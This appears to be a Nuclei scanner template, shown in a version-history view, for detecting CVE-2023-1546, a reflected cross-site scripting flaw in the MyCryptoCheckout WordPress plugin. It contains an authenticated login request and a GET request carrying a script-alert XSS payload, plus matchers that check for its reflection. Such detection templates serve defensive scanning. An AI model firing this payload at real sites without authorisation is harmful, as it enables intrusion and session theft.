nuclei-templates/http/cves/2023/CVE-2023-1546.yaml

51 lines
2.0 KiB
YAML
Raw Normal View History

2023-07-15 18:06:25 +00:00
id: CVE-2023-1546
info:
2023-07-16 17:28:45 +00:00
name: MyCryptoCheckout < 2.124 - Cross-Site Scripting
2023-07-15 18:06:25 +00:00
author: Harsh
severity: medium
description: |
2023-07-18 05:49:43 +00:00
The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:43:37 +00:00
remediation: Fixed in version 2.124
2023-07-15 18:06:25 +00:00
reference:
- https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0
2023-07-16 17:28:45 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-1546
2023-07-15 18:06:25 +00:00
classification:
2023-08-31 11:46:18 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2023-07-15 18:06:25 +00:00
cve-id: CVE-2023-1546
2023-08-31 11:46:18 +00:00
cwe-id: CWE-79
epss-score: 0.00071
epss-percentile: 0.29179
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout:*:*:*:*:*:wordpress:*:*
2023-07-16 17:28:45 +00:00
metadata:
verified: true
2023-09-06 11:43:37 +00:00
max-request: 2
2023-08-31 11:46:18 +00:00
vendor: plainviewplugins
product: mycryptocheckout
2023-09-06 11:43:37 +00:00
framework: wordpress
2023-12-05 09:50:33 +00:00
tags: cve,cve2023,wordpress,wp,wp-plugin,xss,wpscan,authenticated,plainviewplugins
2023-07-15 18:06:25 +00:00
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
2023-07-16 17:28:45 +00:00
GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&"><script>alert(/XSS/)</script> HTTP/1.1
2023-07-15 18:06:25 +00:00
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
2023-07-16 17:28:45 +00:00
- 'contains(body_2, "scriptalert(/XSS/)/script")'
- 'contains(body_2, "mycryptocheckout")'
2023-07-15 18:06:25 +00:00
condition: and
# digest: 490a004630440220712abc3898ee84623001d791159126880f63cbf95af22f67b3d7e111708140e8022033dc492cb0e15578a8b012b7f4b80d01364749aecb28a7d3d16573d7d3a69a1a:922c64590222798bb761d5b6d8e72950